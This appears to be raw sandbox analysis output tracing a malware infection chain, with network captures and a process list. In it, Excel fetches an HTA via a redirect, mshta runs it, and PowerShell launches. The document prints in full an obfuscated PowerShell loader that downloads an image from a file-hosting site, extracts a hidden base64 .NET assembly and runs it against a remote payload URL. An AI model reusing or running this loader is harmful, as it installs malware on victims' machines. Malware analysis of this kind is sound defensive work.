                                                                                                            2024-11-20 15:57:48 UTC | 324 | IN | HTTP/1.1 200 OK
                                                                                                            Content-Length: 2230233
                                                                                                            Content-Type: image/jpeg
                                                                                                            Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                            X-Transfer-ID: wxhdiueivoluihj
                                                                                                            Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                            Date: Wed, 20 Nov 2024 15:57:48 GMT
                                                                                                            Connection: close


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 198.244.140.41
Destination Port: 443
PID: 3552
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp: 2024-11-20 15:57:49 UTC; Bytes transferred: 388; Direction: OUT
GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive

Timestamp: 2024-11-20 15:57:50 UTC; Bytes transferred: 443; Direction: IN
HTTP/1.1 302 Found
Content-Length: 96
Content-Type: text/plain; charset=utf-8
Date: Wed, 20 Nov 2024 15:57:50 GMT
Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close

Timestamp: 2024-11-20 15:57:50 UTC; Bytes transferred: 96; Direction: IN
Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49171
Destination IP: 198.244.140.41
Destination Port: 443
PID: 3652
Process: C:\Windows\System32\mshta.exe

Timestamp: 2024-11-20 15:57:54 UTC; Bytes transferred: 412; Direction: OUT
GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive

Timestamp: 2024-11-20 15:57:54 UTC; Bytes transferred: 443; Direction: IN
HTTP/1.1 302 Found
Content-Length: 96
Content-Type: text/plain; charset=utf-8
Date: Wed, 20 Nov 2024 15:57:54 GMT
Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close

Timestamp: 2024-11-20 15:57:54 UTC; Bytes transferred: 96; Direction: IN
Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


Session ID: 5
Source IP: 192.168.2.22
Source Port: 49174
Destination IP: 142.215.209.78
Destination Port: 443
PID: 2144
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 192; Direction: OUT
GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
Host: 1017.filemail.com
Connection: Keep-Alive

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 324; Direction: IN
HTTP/1.1 200 OK
Content-Length: 2230233
Content-Type: image/jpeg
Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
Accept-Ranges: bytes
ETag: 4bb5a8185f3b16880e3dcc573015c5d9
X-Transfer-ID: wxhdiueivoluihj
Content-Disposition: attachment; filename=new_imagem.jpg
Date: Wed, 20 Nov 2024 15:58:10 GMT
Connection: close

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 1721; Direction: IN
Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 68 85 06 2d 03 15 16 09 8b f0 8f f9 b3 2b 53 a6 78 64 0d e8 65 2c 18 80 9c 1e 7a d5 e0 6c bc 4b 06 8c 2e 98 b4 61 5c 51 56 e0 82 7b e2 fa bd 6a 47 e6 47 3b b2 95 55 55 55 6e 58 d1 e4 e5 9b ef 22 12 aa f1 9e 81 57 61 e8 7e b8 a9 f0 99 f5 32 07 d4 4c a5 81 aa 29 c0 fd 70 2b a4 7d 3c 7a 60 c9 33 42 cd 19 7b 2d 7e ab c3 ea 75 da 81 0c 28 1f cb 05 77 39 ff 00 11 f6 fa e0 b4 fe 0a b1 36 e7 74 6b 26 b7 25 ed e7 fd ec 72 74 7b 2e 24 86 c8 17 fb a2 2c 0f f8 b0 12 28 92 4e 80 b2 98 65 1b f7 6d a3 bb fc 3f 9e 3b a8 6d ed 1c 01 da 25 6f c4 ca 68 8a ed 94 31 ca 88 14 3c 60 76 2b 15 1f cf 76 0d 8c e4 80 1e 36 27 d2 db 92 ff 00 4d d8 02 d6 cd 2c 51 c5 0c 73 9b 01 98 b8 f5 58 1d 32 35 1a dd f3 23 2c 92 ae e8 83 00 a6 86 e2 7b e3 88 b2 0b a7 81 5a b6 9a 82 8d 7f cd 8a 6a
Data Ascii: h-+Sxde,zlK.a\QV{jGG;UUUnX"Wa~2L)p+}<z`3B{-~u(w96tk&%rt{.$,(Nem?;m%oh1<`v+v6'M,QsX25#,{Zj

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c e9 f5 9a 68 94 d2 18 d9 95 48 45 53 46 d5 6e c9 3c 75 39 95 24 b2 ac f1 b9 3c 58 2a 36 8a 03 b5 0e 99 67 26 47 0f c7 3f 88 9e 6f fd 56 07 0d 68 86 6d f0 a9 02 f9 5b e3 27 53 aa d3 6a d8 b1 8d a3 7e b6 28 e5 7c b2 ac c4 6d af e7 8b 94 56 26 8a 83 f3 c0 34 7a c9 21 1b 1c 09 23 6e a1 b9 39 41 24 7e 73 3a 06 41 5e 90 a7 9b c8 58 19 89 b6 07 6f 61 d4
Data Ascii: )w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u9$<X*6g&G?oVhm['Sj~(|mV&4z!#n9A$~s:A^Xoa

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4 93 a8 60 7d 5b 55 ab 70 04 58 53 f0 ca 95 0f a8 8e 80 0a e1 4f 07 bf 7e 3e 77 81 b3 06 b1 1f 4c 1d f7 33 01 66 91 88 ef de b1 27 09 47 52 24
Data Ascii: 9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50*r`}[UpXSO~>wL3f'GR$

Timestamp: 2024-11-20 15:58:10 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 83 b6 9a 81 1e e0 d7 e7 99 ea ea 9a 70 85 cb 5b 6f 65 b3 ea ae 83 a7 c8 fd 72 b1 12 b0 48 aa c4 d9 50 77 70 40 a3 d3 18 08 91 a8 2c 55 c2 ad 2a 91 c9 f8 9f d3 00 69 af 79 b5 12 04 4d bb c0 55 61 ce c1 ed c6 3e 64 86 76 d3 e9 9a 42 cf 23 d3 3e c2 2a e8 0f d3 31 a2 95 60 d6 2c a6 30 cb 76 53 a5 8c f4 30 3f 86 4d 34 1a 9d 3c 33 26 a1 3f 7a d1 96 56 5f c5 d0 92 45 71 81 57 96 28 75 3a 8e 15 85 04 55 6b 20 57 5e 07 cb 07 ae 08 d2 69 29 6e 32 8a df 86 ac 96 37 db 3b c4 64 6d 3e af f7 8b e5 cc 1c b3 a1 a3 b4 1e 42 9a ea 7a e5 67 77 9f 42 a9 13 b6 d0 c0 79 64 02 c0 f6 23 bd 12 7b 60 03 53 23 cb 34 c8 eb b4 9f 48 51 c5 7b 66 3c ae 68 c6 0f a5 4f 19 ba 66 10 e9 4b cc aa 65 54 3b 18 af 27 b7 ab 9e bd 6b 8c f3 cd 6c 49 ae a6 f8 c0 ad 9c 9d c6 aa b9 cb 2a 73 ce 59 d0
Data Ascii: p[oerHPwp@,U*iyMUa>dvB#>*1`,0vS0?M4<3&?zV_EqW(u:Uk W^i)n27;dm>BzgwByd#{`S#4HQ{f<hOfKeT;'klI*sY

Timestamp: 2024-11-20 15:58:11 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 8f 51 39 b1 16 89 e6 76 48 91 a7 2a 7a a2 b5 57 63 d0 66 a4 5f 67 35 44 29 67 89 5c f5 52 c6 c7 e4 2b 03 23 47 ac f1 0f 0e d2 be 96 29 0a a3 13 4d 6c 0a f5 e1 79 aa e7 db 22 24 4d 36 ac ea 5a 38 b5 0e c7 75 48 59 80 6b 1e a3 ee 73 75 fe cc eb 9c 58 96 2f 80 dc df fa 72 a3 ec b6 b8 8e 65 d3 7f cc d7 ff 00 97 03 87 da 5d 64 df 8a 3d 3a d7 03 68 6a fc b7 60 e6 f1 a9 a6 84 a4 90 c2 c0 8a 36 8c 7f 99 c3 7f f0 d6 bd 1b 73 4b 01 1f 06 6e bf f2 e4 7f b0 35 45 58 97 84 03 fe 66 ff 00 d3 81 89 3c 61 e0 60 83 96 5f 6a 1f 4c c8 d1 ea 26 d0 48 11 11 4b 16 e5 8e e2 4f c0 e7 aa 93 c1 35 30 ac 9b 9d 18 22 17 e0 37 e1 af 72 33 ce cf a6 29 2c b2 73 4c 6c 5f b7 1d 30 3a 7d 73 4c f2 39 82 2d ee 17 73 05 3d 40 36 47 27 18 97 5c d0 78 76 9e 05 8a 16 46 88 92 1b 71 fe 26 1e ff
Data Ascii: Q9vH*zWcf_g5D)g\R+#G)Mly"$M6Z8uHYksuX/re]d=:hj`6sKn5EXf<a`_jL&HKO50"7r3),sLl_0:}sL9-s=@6G'\xvFq&

Timestamp: 2024-11-20 15:58:11 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: f5 93 1e b9 de 16 69 1a c0 e7 93 d3 3c ec f3 4e ac 55 c3 06 00 75 ed df 1d 79 74 c5 23 02 60 03 00 cc 07 bf b5 60 55 66 9b 59 ab dc 37 04 be d9 a2 27 d4 a2 b1 8f 4b c0 1c 16 61 67 f5 c6 60 d2 c4 9a 65 64 06 aa ec 29 c9 8d d4 39 34 c7 8e 84 60 62 ea 5d ce be 3d 40 8b 66 e5 01 b9 03 9c 6f 51 e5 a2 16 26 fe bc de 46 b1 e1 45 94 ec 66 2d ef db 33 63 49 b5 53 46 a6 c8 69 00 17 f2 bf e9 81 01 98 b3 3e c6 f2 c1 a2 6c 63 ba 6d 12 cd a6 32 0d c1 8b 50 27 e1 89 ea 9b c9 d5 50 b6 81 5f 80 05 02 47 51 9e 93 c3 1a 39 a0 f4 02 a0 fa c2 f7 1e f8 1e 6b 5b a3 d4 c1 29 96 44 6a 15 4d d2 f3 47 47 e1 33 38 8e 59 67 55 91 69 aa ac 81 ec 73 73 59 02 cf 08 50 54 9d d5 52 a6 e1 99 da b9 df 4a 91 aa ab 79 ac 00 21 79 51 ef 80 b3 c7 0e b1 27 48 ce e2 ad 5d 2b 9c c3 78 36 c2 24 be
Data Ascii: i<NUuyt#``UfY7'Kag`ed)94`b]=@foQ&FEf-3cISFi>lcm2P'P_GQ9k[)DjMGG38YgUissYPTRJy!yQ'H]+x6$

Timestamp: 2024-11-20 15:58:11 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 51 a8 69 18 47 b0 47 18 3e 95 0b 46 bb 60 6e 1d 44 5a 3d 51 4d 2f 94 d7 e6 06 65 04 72 ab 60 5f ce b9 c4 34 a1 27 66 69 91 14 ac 1b 94 b1 62 03 19 05 13 56 48 e7 a6 67 3e a2 57 91 5d e4 91 99 6b 69 66 24 8f ae 74 73 32 4b bc 3b 06 bb 04 31 1d 7a e0 6a 79 71 c4 24 91 63 32 6d 74 50 05 f7 52 49 53 d7 a8 e2 f1 6d 4e d9 bc 5b 54 18 7a 43 4a 55 7a 55 06 23 f5 03 14 12 3b 39 70 79 1d 7d 44 5e 41 95 84 ef 27 05 9b 75 df c6 c1 fe 78 0d cf 1c 42 30 c9 44 ec 52 40 dc 48 24 0b b3 54 07 27 a7 7c 16 a3 4d b0 ea 29 08 0b 38 44 bf 6f 57 f6 18 03 33 b4 7b 0b 31 51 d1 6c d0 ce 32 c8 48 63 23 13 ef 7f eb dc e0 3b 2a 98 57 52 62 97 cb 53 33 26 d0 5a d8 0e 9d 38 ef 99 db af e5 85 de 40 3b 59 80 6e b7 dc fe 7f 2c 08 04 f3 81 78 ab cc 00 93 5d f8 bc 7b ee a1 23 4d c8 a7 cd 57
Data Ascii: QiGG>F`nDZ=QM/er`_4'fibVHg>W]kif$ts2K;1zjyq$c2mtPRISmN[TzCJUzU#;9py}D^A'uxB0DR@H$T'|M)8DoW3{1Ql2Hc#;*WRbS3&Z8@;Yn,x]{#MW

Timestamp: 2024-11-20 15:58:11 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: 30 fc 80 fe 99 e8 75 de 2a fa f6 12 4a c9 14 60 92 14 74 f7 e7 f2 ff 00 db bf 94 d5 96 6d 43 3d 0a 26 f8 ed 80 cb e9 e3 da 36 ea 62 6b 1c 29 0c 09 f8 1e 2a fe b8 fe b5 64 4d 66 a4 3d b9 99 42 c4 55 41 0d eb 52 54 7e 59 8d fb d7 65 2a ac 41 14 a7 de b3 4a 7d 44 9a 5d 4e a5 f6 ab 89 24 6e 0f e1 5e 5b 6b 0f f3 70 79 ec 3f 40 6b 51 19 2a cf 31 8b 4e 1d f7 b0 90 b2 bf 7e 59 49 e7 ad 7a 54 f3 7d 3a e0 e4 1a 43 a7 88 be a7 7b 46 bb 76 42 84 5a db 37 e2 60 2b af b6 25 a8 81 a0 41 22 33 34 7c ee 2d 5b 95 b7 30 a3 c9 f6 eb 80 99 9e 16 65 65 da 77 15 f9 d1 c0 d5 3a cd 34 50 48 d0 45 12 96 55 55 0e 0b b7 04 1f 56 ef 49 e9 db f2 c0 ea f5 8f a8 88 ac 93 c9 21 de 0a 86 63 41 76 f5 2a 78 04 7c 3e 3f 0c 45 57 cc 49 5c b5 84 53 c1 f7 24 0a cb c7 1f 9a 41 f3 02 0f 50 b6 da
Data Ascii: 0u*J`tmC=&6bk)*dMf=BUART~Ye*AJ}D]N$n^[kpy?@kQ*1N~YIzT}:C{FvBZ7`+%A"34|-[0eew:4PHEUUVI!cAv*x|>?EWI\S$AP

Timestamp: 2024-11-20 15:58:11 UTC; Bytes transferred: 8192; Direction: IN
Data Raw: ec ca 87 b7 43 ef 87 04 c2 02 1e 4f 73 ed f0 c0 50 c4 c4 6c 55 e1 7a 9f 73 9c 23 2a 79 18 e0 52 a0 90 6f 76 41 5f e1 23 00 02 32 c6 f6 f5 c2 08 8d 7e 1a c6 23 52 0d 01 c6 1e 18 0b 03 c6 02 8b 16 68 69 23 70 82 a1 dc 3b 5b d6 42 c2 6a ab be 69 e8 f4 ee 12 33 6b c3 1e 3e 98 0a ca ba 9e 07 92 23 1e c3 9c 96 fb cc 9e 96 4d cb 5c 2f 19 ab 2c 47 82 c4 75 e9 83 2a 77 82 07 5f 7c 0c c4 81 94 9d ba 7e 7e 79 29 a7 95 5c fe ec 90 7f 87 36 97 4c d4 18 aa f3 ed 85 5d 33 10 dd 86 07 9e 3a 37 07 94 a1 90 b0 15 71 69 7c f4 cf 42 b0 16 ea 56 c1 a3 c6 13 c9 aa 04 29 fa 60 79 d6 d2 b8 24 95 ab 39 5f bb b8 37 b7 3d 31 d3 fa 4a f0 4e 42 69 13 93 27 2a be a3 f4 e7 03 09 e1 78 b4 2c 86 c1 91 94 9f 88 ab af fc a7 fe 2c 4c 42 6c 71 9e a6 58 03 40 8c 54 29 60 58 df b9 3f da b3 3d
Data Ascii: COsPlUzs#*yRovA_#2~#Rhi#p;[Bji3k>#M\/,Gu*w_|~~y)\6L]3:7qi|BV)`y$9_7=1JNBi'*x,,LBlqX@T)`X?=


Target ID: 0
Start time: 10:56:53
Start date: 20/11/2024
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13fe40000
File size: 28'253'536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 10:57:19
Start date: 20/11/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\mshta.exe -Embedding
Imagebase: 0x13fbb0000
File size: 13'824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:57:28
Start date: 20/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
Imagebase: 0x13f430000
File size: 443'392 bytes
MD5 hash: A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 10:57:30
Start date: 20/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
Imagebase: 0x13f430000
File size: 443'392 bytes
MD5 hash: A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 10:57:33
Start date: 20/11/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
Imagebase: 0x13fee0000
File size: 2'758'280 bytes
MD5 hash: 23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:10:57:33
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
                                                                                                            Imagebase:0x13f830000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:10:57:40
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                            Imagebase:0xff870000
                                                                                                            File size:168'960 bytes
                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:10:57:40
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                                            Imagebase:0x190000
                                                                                                            File size:2'525'680 bytes
                                                                                                            MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:15
                                                                                                            Start time:10:57:41
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:17
                                                                                                            Start time:10:57:42
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:18
                                                                                                            Start time:10:57:49
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                            Imagebase:0x13f4b0000
                                                                                                            File size:13'824 bytes
                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:10:57:56
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
